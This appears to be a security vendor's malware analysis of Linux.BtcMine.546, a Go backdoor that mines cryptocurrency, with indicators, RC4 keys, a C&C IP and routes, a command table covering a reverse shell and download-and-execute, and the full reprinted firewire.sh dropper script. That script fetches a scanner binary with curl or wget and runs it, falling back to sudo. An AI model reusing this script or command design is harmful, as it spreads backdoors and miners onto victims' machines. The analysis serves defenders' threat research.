sha1
- e545ceffc8948e3ca9900212807cf3a862d33581
Description
Linux.BtcMine.546 is a trojan backdoor program capable of infecting Linux devices and launching a cryptocurrency miner. This trojan has advanced remote control capabilities. It is implemented as an ELF64 executable file written in Go.
Operating routine
When launched, the trojan checks whether it has been run on the computer before. If it finds a running process, as indicated by the presence of a .lock file, the instance of the trojan that is running is terminated. The trojan then obtains its settings using the envconfig library, which allows it to initialize its configuration based on the environment variables. In particular, envconfig writes the IP address of the C&C server and the flag for enabling the miner into the Specification structure:
struct Specification{
string Backend; // IP address of C&C server, string encoded with RC4
bool Debug;
bool DisableMi; // miner activation flag
};
If the IP address of the C&C server is not specified in the configuration, the trojan uses the default address hxxp://185.154.53[.]140. System information, including the operating system name, architecture type, trojan version, number of processor cores, memory size, and other parameters, is sent to the control server. Once this happens, the trojan is ready to receive commands. Note that all traffic between the trojan and the control server is encrypted with the RC4 stream cipher. The following two sequences are used as keys: 2abd6e2c1akl762939453125 and 764153446b61.
List of supported commands
Name | Description |
---|---|
scan | Initiates a port scan |
update | Downloads a new version of the trojan and restarts it |
exec | Runs the command using /bin/sh -c |
exec_output | Runs the command using /bin/sh -c Theresult is sent to the C&C server |
masscan | Creates a firewire.sh script Runs it Deletes the script |
socks | Creates a proxy (SOCKS5) |
backconnect | Creates a reverse shell |
request | Sends HTTP requests |
tcp | Redirects the payload to the target computer |
download_and_exec | Downloads a file and runs it The result is sent to the C&C server The downloaded file is deleted from the system |
redisBrute | Starts brute forcing the authentication form in Redis |
krongo | Changes the IP address of the active C&C server |
stat | Sends information to the C&C server about how much memory the miner is using |
mkill | Shuts down the miner |
List of routes used
Name | Description | Method |
---|---|---|
/o | Sends results to the server | POST |
/mg | Obtains the PID of the current miner | GET |
/ms | Sends the miner PID | POST |
/getT | Receives additional command information (arguments) | POST |
/get | Obtains a task | GET |
/s | Sends SOCK5 connection data | POST |
/r | Sends the result of the executed command | POST |
/l | Sends log files | POST |
/h | Sends keep-alive packets | GET |
The firewire.sh script created and executed by the trojan checks the OS distribution information in the /etc/os-release file, determines the type of package manager, looks for the installed libpcap-devel package (a library for low-level network monitoring) and installs it if it is missing.
#!/bin/sh
PORT=$1
RATE=$2
INPUT=$3
OUTPUT=$4
MASSCAN=$5
cat /etc/os-release | grep -vw grep | grep "rhel" >/dev/null
if [ $? -eq 0 ]
then
rpm -qa | grep libpcap-dev > /dev/null
if [[ $? -eq 0 ]]; then
echo "Package is installed rhel!"
els'
echo "Package is NOT installed rhel!"
yum -y update
yum -y install libpcap-devel
fi
else
if [ $(dpkg-query -W -f=',27h,'${Status}',27h,' libpcap-dev 2
>/dev/null | grep -c "ok installed") -eq 0 ];
then
echo "Package is NOT installed deb!"
apt-get update
apt-get install -y libpcap-dev
else
echo "Package is installed deb!"
fi
fi
if [ -x "$(command -v md5sum)" ]; then
sum=$(md5sum firewire | awk ',27h,'{ print $1 }',27h,')
echo $sum
case $sum in
45a7ef83238f5244738bb5e7e3dd6299)
echo "firewire OK"
;;
*)
echo "firewire wrong"
(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
;;'
esac
else
echo "No md5sum"'
(curl -o firewire $MASSCAN || wget -O firewire $MASSCAN)
fi
chmod +x firewire
./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2>/dev/null
if [ $? -eq 0 ]
then
echo "success"
else
echo "fail"
sudo ./firewire -iL $INPUT --rate $RATE -p$PORT -oL $OUTPUT 2
>/dev/null
if [ $? -eq 0 ]
then
echo "success2"
else
echo "fail2"
fi
fi
The trojan uses a Go-adapted version of the psutil library to obtain information about running processes: https://github.com/shirou/gopsutil/tree/master.
HTTP requests are processed using the Resty library: https://github.com/go-resty/resty.
Interaction with SOCKS5 proxies is enabled using the go-socks5 package: https://github.com/armon/go-socks5.